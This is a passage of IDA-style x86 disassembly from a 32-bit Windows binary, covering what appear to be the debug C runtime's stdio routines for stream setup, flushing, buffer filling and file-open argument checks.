jmp short loc_420EF6
; ---------------------------------------------------------------------------
loc_420EED: ; CODE XREF: sub_41FBE0+12F7�j
; sub_41FBE0+12FF�j
mov eax, [ebp+var_34]
mov [ebp+var_224], eax
loc_420EF6: ; CODE XREF: sub_41FBE0+130B�j
mov eax, [ebp+var_224]
jmp short loc_420F01
; ---------------------------------------------------------------------------
loc_420EFE: ; CODE XREF: sub_41FBE0+12F1�j
mov eax, [ebp+var_34]
loc_420F01: ; CODE XREF: sub_41FBE0+131C�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41FBE0 endp
; ---------------------------------------------------------------------------
off_420F08 dd offset loc_41FE9A ; DATA XREF: sub_41FBE0+239�r
dd offset loc_41FE20
dd offset loc_41FE38
dd offset loc_41FE7C
dd offset loc_41FE25
dd offset loc_41FE87
dd offset loc_41FE8F
dd offset loc_41FEA5
byte_420F28 db 0 ; DATA XREF: sub_41FBE0+233�r
db 3 dup(7)
dd 6 dup(7070707h), 2070701h, 7030707h, 7070701h, 5 dup(7070707h)
dd 7040707h, 7050707h, 2 dup(7070707h)
db 7, 6
off_420F76 dd offset loc_41FFAB ; DATA XREF: sub_41FBE0+3C4�r
dd offset loc_4204E4
dd offset loc_420957
dd offset loc_4203DB
dd offset loc_420942
dd offset loc_4204E0
dd offset loc_41FFF1
dd offset loc_4203E2
dd offset loc_420016
dd offset loc_420D2A
byte_420F9E db 0 ; DATA XREF: sub_41FBE0+3BE�r
db 1
dd 9020202h, 9090903h, 5010409h, 9060909h, 7090901h, 0CC080909h
dd 2 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420FC0 proc near ; CODE XREF: sub_41FBE0+9E9�p
; sub_41FBE0+BCC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
cmp dword_442F58, 1
jle short loc_420FE2
push 4
mov eax, [ebp+arg_0]
push eax
call sub_41E750
add esp, 8
mov [ebp+var_4], eax
jmp short loc_420FF7
; ---------------------------------------------------------------------------
loc_420FE2: ; CODE XREF: sub_420FC0+D�j
mov ecx, [ebp+arg_0]
mov edx, off_442D4C
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 4
mov [ebp+var_4], eax
loc_420FF7: ; CODE XREF: sub_420FC0+20�j
cmp [ebp+var_4], 0
jz short loc_421005
mov ecx, [ebp+arg_0]
mov [ebp+var_8], ecx
jmp short loc_421011
; ---------------------------------------------------------------------------
loc_421005: ; CODE XREF: sub_420FC0+3B�j
mov edx, [ebp+arg_0]
and edx, 0FFFFFFDFh
sub edx, 7
mov [ebp+var_8], edx
loc_421011: ; CODE XREF: sub_420FC0+43�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_420FC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421020 proc near ; CODE XREF: sub_41FBE0+370�p
; sub_41FBE0+698�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
sub ecx, 1
mov edx, [ebp+arg_0]
mov [edx+4], ecx
mov eax, [ebp+arg_0]
cmp dword ptr [eax+4], 0
jl short loc_42105B
mov ecx, [ebp+arg_0]
mov edx, [ecx]
movsx eax, byte ptr [edx]
and eax, 0FFh
mov [ebp+var_4], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_0]
mov [eax], edx
jmp short loc_42106A
; ---------------------------------------------------------------------------
loc_42105B: ; CODE XREF: sub_421020+1A�j
mov ecx, [ebp+arg_0]
push ecx
call sub_421790
add esp, 4
mov [ebp+var_4], eax
loc_42106A: ; CODE XREF: sub_421020+39�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_421020 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421080 proc near ; CODE XREF: sub_41FBE0+EC�p
; sub_41FBE0+666�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0FFFFFFFFh
jz short loc_421099
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_427990
add esp, 8
loc_421099: ; CODE XREF: sub_421080+7�j
pop ebp
retn
sub_421080 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4210A0 proc near ; CODE XREF: sub_41FBE0+E3�p
; sub_41FBE0+353�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
loc_4210A4: ; CODE XREF: sub_4210A0+30�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_0]
mov [edx], ecx
mov eax, [ebp+arg_4]
push eax
call sub_421020
add esp, 4
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
push ecx
call sub_427670
add esp, 4
test eax, eax
jz short loc_4210D2
jmp short loc_4210A4
; ---------------------------------------------------------------------------
loc_4210D2: ; CODE XREF: sub_4210A0+2E�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_4210A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4210E0 proc near ; DATA XREF: .data:0043400C�o
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
cmp dword_493760, 0
jnz short loc_4210F9
mov dword_493760, 200h
jmp short loc_42110C
; ---------------------------------------------------------------------------
loc_4210F9: ; CODE XREF: sub_4210E0+B�j
cmp dword_493760, 14h
jge short loc_42110C
mov dword_493760, 14h
loc_42110C: ; CODE XREF: sub_4210E0+17�j
; sub_4210E0+20�j
push 83h
push offset a_file_c ; "_file.c"
push 2
push 4
mov eax, dword_493760
push eax
call sub_416E40
add esp, 14h
mov dword_492750, eax
cmp dword_492750, 0
jnz short loc_421175
mov dword_493760, 14h
push 86h
push offset a_file_c ; "_file.c"
push 2
push 4
mov ecx, dword_493760
push ecx
call sub_416E40
add esp, 14h
mov dword_492750, eax
cmp dword_492750, 0
jnz short loc_421175
push 1Ah
call sub_41BAE0
add esp, 4
loc_421175: ; CODE XREF: sub_4210E0+54�j
; sub_4210E0+89�j
mov [ebp+var_4], 0
jmp short loc_421187
; ---------------------------------------------------------------------------
loc_42117E: ; CODE XREF: sub_4210E0+C4�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_421187: ; CODE XREF: sub_4210E0+9C�j
cmp [ebp+var_4], 14h
jge short loc_4211A6
mov eax, [ebp+var_4]
shl eax, 5
add eax, offset off_442F80
mov ecx, [ebp+var_4]
mov edx, dword_492750
mov [edx+ecx*4], eax
jmp short loc_42117E
; ---------------------------------------------------------------------------
loc_4211A6: ; CODE XREF: sub_4210E0+AB�j
mov [ebp+var_4], 0
jmp short loc_4211B8
; ---------------------------------------------------------------------------
loc_4211AF: ; CODE XREF: sub_4210E0:loc_421206�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_4211B8: ; CODE XREF: sub_4210E0+CD�j
cmp [ebp+var_4], 3
jge short loc_421208
mov ecx, [ebp+var_4]
sar ecx, 5
mov edx, [ebp+var_4]
and edx, 1Fh
imul edx, 24h
mov eax, dword_492420[ecx*4]
cmp dword ptr [eax+edx], 0FFFFFFFFh
jz short loc_4211F6
mov ecx, [ebp+var_4]
sar ecx, 5
mov edx, [ebp+var_4]
and edx, 1Fh
imul edx, 24h
mov eax, dword_492420[ecx*4]
cmp dword ptr [eax+edx], 0
jnz short loc_421206
loc_4211F6: ; CODE XREF: sub_4210E0+F8�j
mov ecx, [ebp+var_4]
shl ecx, 5
mov dword_442F90[ecx], 0FFFFFFFFh
loc_421206: ; CODE XREF: sub_4210E0+114�j
jmp short loc_4211AF
; ---------------------------------------------------------------------------
loc_421208: ; CODE XREF: sub_4210E0+DC�j
mov esp, ebp
pop ebp
retn
sub_4210E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421210 proc near ; DATA XREF: .data:0043401C�o
push ebp
mov ebp, esp
call sub_421640
movsx eax, byte_4920C8
test eax, eax
jz short loc_421228
call sub_427AD0
loc_421228: ; CODE XREF: sub_421210+11�j
pop ebp
retn
sub_421210 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421230 proc near ; CODE XREF: sub_419740+55�p
; sub_419B30+80�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp [ebp+arg_0], offset off_442F80
jb short loc_42125E
cmp [ebp+arg_0], offset dword_4431E0
ja short loc_42125E
mov eax, [ebp+arg_0]
sub eax, offset off_442F80
sar eax, 5
add eax, 1Ch
push eax
call sub_41BC90
add esp, 4
jmp short loc_42126B
; ---------------------------------------------------------------------------
loc_42125E: ; CODE XREF: sub_421230+A�j
; sub_421230+13�j
mov ecx, [ebp+arg_0]
add ecx, 20h
push ecx
call ds:dword_494304
loc_42126B: ; CODE XREF: sub_421230+2C�j
pop ebp
retn
sub_421230 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421270 proc near ; CODE XREF: sub_421650+7E�p
; sub_421D10+6F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp [ebp+arg_0], 14h
jge short loc_42128A
mov eax, [ebp+arg_0]
add eax, 1Ch
push eax
call sub_41BC90
add esp, 4
jmp short loc_421297
; ---------------------------------------------------------------------------
loc_42128A: ; CODE XREF: sub_421270+7�j
mov ecx, [ebp+arg_4]
add ecx, 20h
push ecx
call ds:dword_494304
loc_421297: ; CODE XREF: sub_421270+18�j
pop ebp
retn
sub_421270 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4212A0 proc near ; CODE XREF: sub_419740+70�p
; sub_419B30+12C�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp [ebp+arg_0], offset off_442F80
jb short loc_4212CE
cmp [ebp+arg_0], offset dword_4431E0
ja short loc_4212CE
mov eax, [ebp+arg_0]
sub eax, offset off_442F80
sar eax, 5
add eax, 1Ch
push eax
call sub_41BD30
add esp, 4
jmp short loc_4212DB
; ---------------------------------------------------------------------------
loc_4212CE: ; CODE XREF: sub_4212A0+A�j
; sub_4212A0+13�j
mov ecx, [ebp+arg_0]
add ecx, 20h
push ecx
call ds:dword_494300
loc_4212DB: ; CODE XREF: sub_4212A0+2C�j
pop ebp
retn
sub_4212A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4212E0 proc near ; CODE XREF: sub_421650+116�p
; sub_421D10+A0�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp [ebp+arg_0], 14h
jge short loc_4212FA
mov eax, [ebp+arg_0]
add eax, 1Ch
push eax
call sub_41BD30
add esp, 4
jmp short loc_421307
; ---------------------------------------------------------------------------
loc_4212FA: ; CODE XREF: sub_4212E0+7�j
mov ecx, [ebp+arg_4]
add ecx, 20h
push ecx
call ds:dword_494300
loc_421307: ; CODE XREF: sub_4212E0+18�j
pop ebp
retn
sub_4212E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421310 proc near ; CODE XREF: sub_4197D0+71�p
; sub_4282A0+400�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
cmp eax, dword_492520
jnb short loc_421341
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, dword_492420[ecx*4]
movsx ecx, byte ptr [eax+edx+4]
and ecx, 1
test ecx, ecx
jnz short loc_42135C
loc_421341: ; CODE XREF: sub_421310+D�j
call sub_422F20
mov dword ptr [eax], 9
call sub_422F30
mov dword ptr [eax], 0
or eax, 0FFFFFFFFh
jmp short loc_421386
; ---------------------------------------------------------------------------
loc_42135C: ; CODE XREF: sub_421310+2F�j
mov edx, [ebp+arg_0]
push edx
call sub_4280C0
add esp, 4
mov eax, [ebp+arg_0]
push eax
call sub_421390
add esp, 4
mov [ebp+var_4], eax
mov ecx, [ebp+arg_0]
push ecx
call sub_428150
add esp, 4
mov eax, [ebp+var_4]
loc_421386: ; CODE XREF: sub_421310+4A�j
mov esp, ebp
pop ebp
retn
sub_421310 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421390 proc near ; CODE XREF: sub_421310+5C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
mov eax, [ebp+arg_0]
push eax
call sub_427F40
add esp, 4
cmp eax, 0FFFFFFFFh
jz short loc_4213E3
cmp [ebp+arg_0], 1
jz short loc_4213B2
cmp [ebp+arg_0], 2
jnz short loc_4213CC
loc_4213B2: ; CODE XREF: sub_421390+1A�j
push 1
call sub_427F40
add esp, 4
mov esi, eax
push 2
call sub_427F40
add esp, 4
cmp esi, eax
jz short loc_4213E3
loc_4213CC: ; CODE XREF: sub_421390+20�j
mov ecx, [ebp+arg_0]
push ecx
call sub_427F40
add esp, 4
push eax
call ds:dword_4942E0
test eax, eax
jz short loc_4213EC
loc_4213E3: ; CODE XREF: sub_421390+14�j
; sub_421390+3A�j
mov [ebp+var_4], 0
jmp short loc_4213F5
; ---------------------------------------------------------------------------
loc_4213EC: ; CODE XREF: sub_421390+51�j
call ds:dword_4942F0
mov [ebp+var_4], eax
loc_4213F5: ; CODE XREF: sub_421390+5A�j
mov edx, [ebp+arg_0]
push edx
call sub_427E60
add esp, 4
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, dword_492420[eax*4]
mov byte ptr [edx+ecx+4], 0
cmp [ebp+var_4], 0
jz short loc_421433
mov eax, [ebp+var_4]
push eax
call sub_422E80
add esp, 4
or eax, 0FFFFFFFFh
jmp short loc_421435
; ---------------------------------------------------------------------------
loc_421433: ; CODE XREF: sub_421390+90�j
xor eax, eax
loc_421435: ; CODE XREF: sub_421390+A1�j
pop esi
mov esp, ebp
pop ebp
retn
sub_421390 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421440 proc near ; CODE XREF: sub_4197D0+62�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
loc_421446: ; CODE XREF: sub_421440+2E�j
cmp [ebp+arg_0], 0
jnz short loc_42146A
push offset aStreamNull ; "stream != NULL"
push 0
push 30h
push offset a_freebuf_c ; "_freebuf.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_42146A
int 3 ; Trap to Debugger
loc_42146A: ; CODE XREF: sub_421440+A�j
; sub_421440+27�j
xor eax, eax
test eax, eax
jnz short loc_421446
mov ecx, [ebp+arg_0]
mov edx, [ecx+0Ch]
and edx, 83h
test edx, edx
jz short loc_4214CD
mov eax, [ebp+arg_0]
mov ecx, [eax+0Ch]
and ecx, 8
test ecx, ecx
jz short loc_4214CD
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+8]
push eax
call sub_4174C0
add esp, 8
mov ecx, [ebp+arg_0]
mov edx, [ecx+0Ch]
and edx, 0FFFFFBF7h
mov eax, [ebp+arg_0]
mov [eax+0Ch], edx
mov ecx, [ebp+arg_0]
mov dword ptr [ecx], 0
mov edx, [ebp+arg_0]
mov dword ptr [edx+8], 0
mov eax, [ebp+arg_0]
mov dword ptr [eax+4], 0
loc_4214CD: ; CODE XREF: sub_421440+3E�j
; sub_421440+4B�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_421440 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp dword ptr [ebp+8], 0
jnz short loc_4214F6
push 0
call sub_421650
add esp, 4
jmp short loc_421520
; ---------------------------------------------------------------------------
loc_4214F6: ; CODE XREF: .text:004214E8�j
mov eax, [ebp+8]
push eax
call sub_421230
add esp, 4
mov ecx, [ebp+8]
push ecx
call sub_421530
add esp, 4
mov [ebp-4], eax
mov edx, [ebp+8]
push edx
call sub_4212A0
add esp, 4
mov eax, [ebp-4]
loc_421520: ; CODE XREF: .text:004214F4�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421530 proc near ; CODE XREF: .text:00421506�p
; sub_421650+B1�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push eax
call sub_421580
add esp, 4
test eax, eax
jz short loc_421548
or eax, 0FFFFFFFFh
jmp short loc_42156F
; ---------------------------------------------------------------------------
loc_421548: ; CODE XREF: sub_421530+11�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+0Ch]
and edx, 4000h
test edx, edx
jz short loc_42156D
mov eax, [ebp+arg_0]
mov ecx, [eax+10h]
push ecx
call sub_428180
add esp, 4
neg eax
sbb eax, eax
jmp short loc_42156F
; ---------------------------------------------------------------------------
loc_42156D: ; CODE XREF: sub_421530+26�j
xor eax, eax
loc_42156F: ; CODE XREF: sub_421530+16�j
; sub_421530+3B�j
pop ebp
retn
sub_421530 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421580 proc near ; CODE XREF: sub_4197D0+53�p
; sub_41A0D0+F8�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_4], 0
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
mov edx, [ecx+0Ch]
and edx, 3
cmp edx, 2
jnz short loc_42161B
mov eax, [ebp+var_8]
mov ecx, [eax+0Ch]
and ecx, 108h
test ecx, ecx
jz short loc_42161B
mov edx, [ebp+var_8]
mov eax, [ebp+var_8]
mov ecx, [edx]
sub ecx, [eax+8]
mov [ebp+var_C], ecx
cmp [ebp+var_C], 0
jle short loc_42161B
mov edx, [ebp+var_C]
push edx
mov eax, [ebp+var_8]
mov ecx, [eax+8]
push ecx
mov edx, [ebp+var_8]
mov eax, [edx+10h]
push eax
call sub_422370
add esp, 0Ch
cmp eax, [ebp+var_C]
jnz short loc_421605
mov ecx, [ebp+var_8]
mov edx, [ecx+0Ch]
and edx, 80h
test edx, edx
jz short loc_421603
mov eax, [ebp+var_8]
mov ecx, [eax+0Ch]
and ecx, 0FFFFFFFDh
mov edx, [ebp+var_8]
mov [edx+0Ch], ecx
loc_421603: ; CODE XREF: sub_421580+72�j
jmp short loc_42161B
; ---------------------------------------------------------------------------
loc_421605: ; CODE XREF: sub_421580+62�j
mov eax, [ebp+var_8]
mov ecx, [eax+0Ch]
or ecx, 20h
mov edx, [ebp+var_8]
mov [edx+0Ch], ecx
mov [ebp+var_4], 0FFFFFFFFh
loc_42161B: ; CODE XREF: sub_421580+1F�j
; sub_421580+2F�j ...
mov eax, [ebp+var_8]
mov ecx, [ebp+var_8]
mov edx, [ecx+8]
mov [eax], edx
mov eax, [ebp+var_8]
mov dword ptr [eax+4], 0
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_421580 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421640 proc near ; CODE XREF: sub_421210+3�p
push ebp
mov ebp, esp
push 1
call sub_421650
add esp, 4
pop ebp
retn
sub_421640 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421650 proc near ; CODE XREF: .text:004214EC�p
; sub_421640+5�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_4], 0
mov [ebp+var_8], 0
push 2
call sub_41BC90
add esp, 4
mov [ebp+var_C], 0
jmp short loc_421680
; ---------------------------------------------------------------------------
loc_421677: ; CODE XREF: sub_421650:loc_42176E�j
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
loc_421680: ; CODE XREF: sub_421650+25�j
mov ecx, [ebp+var_C]
cmp ecx, dword_493760
jge loc_421773
mov edx, [ebp+var_C]
mov eax, dword_492750
cmp dword ptr [eax+edx*4], 0
jz loc_42176E
mov ecx, [ebp+var_C]
mov edx, dword_492750
mov eax, [edx+ecx*4]
mov ecx, [eax+0Ch]
and ecx, 83h
test ecx, ecx
jz loc_42176E
mov edx, [ebp+var_C]
mov eax, dword_492750
mov ecx, [eax+edx*4]
push ecx
mov edx, [ebp+var_C]
push edx
call sub_421270
add esp, 8
mov eax, [ebp+var_C]
mov ecx, dword_492750
mov edx, [ecx+eax*4]
mov eax, [edx+0Ch]
and eax, 83h
test eax, eax
jz short loc_421755
cmp [ebp+arg_0], 1
jnz short loc_421719
mov ecx, [ebp+var_C]
mov edx, dword_492750
mov eax, [edx+ecx*4]
push eax
call sub_421530
add esp, 4
cmp eax, 0FFFFFFFFh
jz short loc_421717
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_421717: ; CODE XREF: sub_421650+BC�j
jmp short loc_421755
; ---------------------------------------------------------------------------
loc_421719: ; CODE XREF: sub_421650+A2�j
cmp [ebp+arg_0], 0
jnz short loc_421755
mov edx, [ebp+var_C]
mov eax, dword_492750
mov ecx, [eax+edx*4]
mov edx, [ecx+0Ch]
and edx, 2
test edx, edx
jz short loc_421755
mov eax, [ebp+var_C]
mov ecx, dword_492750
mov edx, [ecx+eax*4]
push edx
call sub_421530
add esp, 4
cmp eax, 0FFFFFFFFh
jnz short loc_421755
mov [ebp+var_8], 0FFFFFFFFh
loc_421755: ; CODE XREF: sub_421650+9C�j
; sub_421650:loc_421717�j ...
mov eax, [ebp+var_C]
mov ecx, dword_492750
mov edx, [ecx+eax*4]
push edx
mov eax, [ebp+var_C]
push eax
call sub_4212E0
add esp, 8
loc_42176E: ; CODE XREF: sub_421650+4B�j
; sub_421650+68�j
jmp loc_421677
; ---------------------------------------------------------------------------
loc_421773: ; CODE XREF: sub_421650+39�j
push 2
call sub_41BD30
add esp, 4
cmp [ebp+arg_0], 1
jnz short loc_421788
mov eax, [ebp+var_4]
jmp short loc_42178B
; ---------------------------------------------------------------------------
loc_421788: ; CODE XREF: sub_421650+131�j
mov eax, [ebp+var_8]
loc_42178B: ; CODE XREF: sub_421650+136�j
mov esp, ebp
pop ebp
retn
sub_421650 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421790 proc near ; CODE XREF: sub_419B30+D7�p
; sub_419DD0+182�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
loc_421799: ; CODE XREF: sub_421790+31�j
cmp [ebp+arg_0], 0
jnz short loc_4217BD
push offset aStrNull ; "str != NULL"
push 0
push 69h
push offset a_filbuf_c ; "_filbuf.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_4217BD
int 3 ; Trap to Debugger
loc_4217BD: ; CODE XREF: sub_421790+D�j
; sub_421790+2A�j
xor eax, eax
test eax, eax
jnz short loc_421799
mov ecx, [ebp+arg_0]
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
and eax, 83h
test eax, eax
jz short loc_4217E5
mov ecx, [ebp+var_4]
mov edx, [ecx+0Ch]
and edx, 40h
test edx, edx
jz short loc_4217ED
loc_4217E5: ; CODE XREF: sub_421790+46�j
or eax, 0FFFFFFFFh
jmp loc_42196D
; ---------------------------------------------------------------------------
loc_4217ED: ; CODE XREF: sub_421790+53�j
mov eax, [ebp+var_4]
mov ecx, [eax+0Ch]
and ecx, 2
test ecx, ecx
jz short loc_421810
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
or al, 20h
mov ecx, [ebp+var_4]
mov [ecx+0Ch], eax
or eax, 0FFFFFFFFh
jmp loc_42196D
; ---------------------------------------------------------------------------
loc_421810: ; CODE XREF: sub_421790+68�j
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
or al, 1
mov ecx, [ebp+var_4]
mov [ecx+0Ch], eax
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
and eax, 10Ch
test eax, eax
jnz short loc_42183B
mov ecx, [ebp+var_4]
push ecx
call sub_427100
add esp, 4
jmp short loc_421846
; ---------------------------------------------------------------------------
loc_42183B: ; CODE XREF: sub_421790+9B�j
mov edx, [ebp+var_4]
mov eax, [ebp+var_4]
mov ecx, [eax+8]
mov [edx], ecx
loc_421846: ; CODE XREF: sub_421790+A9�j
mov edx, [ebp+var_4]
mov eax, [edx+18h]
push eax
mov ecx, [ebp+var_4]
mov edx, [ecx+8]
push edx
mov eax, [ebp+var_4]
mov ecx, [eax+10h]
push ecx
call sub_421E90
add esp, 0Ch
mov edx, [ebp+var_4]
mov [edx+4], eax
mov eax, [ebp+var_4]
cmp dword ptr [eax+4], 0
jz short loc_42187B
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+4], 0FFFFFFFFh
jnz short loc_4218AB
loc_42187B: ; CODE XREF: sub_421790+E0�j
mov edx, [ebp+var_4]
mov eax, [edx+4]
neg eax
sbb eax, eax
and eax, 10h
add eax, 10h
mov ecx, [ebp+var_4]
mov edx, [ecx+0Ch]
or edx, eax
mov eax, [ebp+var_4]
mov [eax+0Ch], edx
mov ecx, [ebp+var_4]
mov dword ptr [ecx+4], 0
or eax, 0FFFFFFFFh
jmp loc_42196D
; ---------------------------------------------------------------------------
loc_4218AB: ; CODE XREF: sub_421790+E9�j
mov edx, [ebp+var_4]
mov eax, [edx+0Ch]
and eax, 82h
test eax, eax
jnz short loc_421911
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+10h], 0FFFFFFFFh
jz short loc_4218E6
mov edx, [ebp+var_4]
mov eax, [edx+10h]
sar eax, 5
mov ecx, [ebp+var_4]
mov edx, [ecx+10h]
and edx, 1Fh
imul edx, 24h
mov eax, dword_492420[eax*4]
add eax, edx
mov [ebp+var_8], eax
jmp short loc_4218ED
; ---------------------------------------------------------------------------
loc_4218E6: ; CODE XREF: sub_421790+131�j
mov [ebp+var_8], offset dword_443658
loc_4218ED: ; CODE XREF: sub_421790+154�j
mov ecx, [ebp+var_8]
movsx edx, byte ptr [ecx+4]
and edx, 82h
cmp edx, 82h
jnz short loc_421911
mov eax, [ebp+var_4]
mov ecx, [eax+0Ch]
or ch, 20h
mov edx, [ebp+var_4]
mov [edx+0Ch], ecx
loc_421911: ; CODE XREF: sub_421790+128�j
; sub_421790+170�j
mov eax, [ebp+var_4]
cmp dword ptr [eax+18h], 200h
jnz short loc_421944
mov ecx, [ebp+var_4]
mov edx, [ecx+0Ch]
and edx, 8
test edx, edx
jz short loc_421944
mov eax, [ebp+var_4]
mov ecx, [eax+0Ch]
and ecx, 400h
test ecx, ecx
jnz short loc_421944
mov edx, [ebp+var_4]
mov dword ptr [edx+18h], 1000h
loc_421944: ; CODE XREF: sub_421790+18B�j
; sub_421790+198�j ...
mov eax, [ebp+var_4]
mov ecx, [eax+4]
sub ecx, 1
mov edx, [ebp+var_4]
mov [edx+4], ecx
mov eax, [ebp+var_4]
mov ecx, [eax]
movsx eax, byte ptr [ecx]
and eax, 0FFh
mov edx, [ebp+var_4]
mov ecx, [edx]
add ecx, 1
mov edx, [ebp+var_4]
mov [edx], ecx
loc_42196D: ; CODE XREF: sub_421790+58�j
; sub_421790+7B�j ...
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_421790 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421980 proc near ; CODE XREF: sub_419C70+DB�p
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 24h
push ebx
push esi
push edi
mov eax, dword_4922C4
mov [ebp+var_1C], eax
mov [ebp+var_18], 0
mov [ebp+var_10], 0
loc_42199F: ; CODE XREF: sub_421980+47�j
cmp [ebp+arg_0], 0
jnz short loc_4219C3
push offset aFilenameNull ; "filename != NULL"
push 0
push 47h
push offset a_open_c ; "_open.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_4219C3
int 3 ; Trap to Debugger
loc_4219C3: ; CODE XREF: sub_421980+23�j
; sub_421980+40�j
xor ecx, ecx
test ecx, ecx
jnz short loc_42199F
loc_4219C9: ; CODE XREF: sub_421980+71�j
cmp [ebp+arg_4], 0
jnz short loc_4219ED
push offset aModeNull ; "mode != NULL"
push 0
push 48h
push offset a_open_c ; "_open.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
